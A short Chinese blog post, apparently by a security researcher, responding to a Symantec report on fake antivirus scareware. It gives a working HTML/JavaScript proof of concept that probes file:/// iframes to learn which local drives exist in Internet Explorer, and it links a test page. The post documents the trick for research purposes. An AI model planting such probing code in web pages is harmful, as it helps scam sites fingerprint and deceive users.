昨天看到篇文章,极其猥琐。
《恶意代码js.SecurityToolFraud诱使用户下载安装流氓安全软件》
http://www.symantec.com/connect/node/1147541
重要是猥琐,其中有个图,显示用户的每个磁盘有多少病毒:
这个图需要得到用户盘符有多少,和KJ讨论了半天。
他说06年时,有老外发了个img加载文件时间,判断文件是否存在的猥琐方式。
不过我没找到这个代码,所以研究下,也搞了一种方式:
- <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
- <HTML>
- <HEAD>
- <TITLE> New Document </TITLE>
- <META NAME="Generator" CONTENT="EditPlus">
- <META NAME="Author" CONTENT="">
- <META NAME="Keywords" CONTENT="">
- <META NAME="Description" CONTENT="">
- </HEAD>
- <BODY>
- <iframe id="c" src="file:///c:/"></iframe>
- <iframe id="d" src="file:///d:/"></iframe>
- <iframe id="e" src="file:///e:/"></iframe>
- <iframe id="f" src="file:///f:/"></iframe>
- <iframe id="w" src="file:///w:/"></iframe>
- <div id="div">
- 哥找到了查看本地磁盘是否存在的方式,暂时只支持ie</br>
- </div>
- <script>
- list = ["c","d","e","f","w"];
- for(i=0;i<list.length;i++)
- {
- try{
- document.getElementById("div").innerHTML+=window.frames[list[i]].document.title+list[i]+"盘存在</br>";
- }catch(qqq){
- document.getElementById("div").innerHTML+=list[i]+"盘不存在</br>";
- }
- }
- </script>
- </BODY>
- </HTML>
在这里记录下,目前只支持IE。
http://www.inbreak.net/kxlzxtest/testlocalpath/1.html
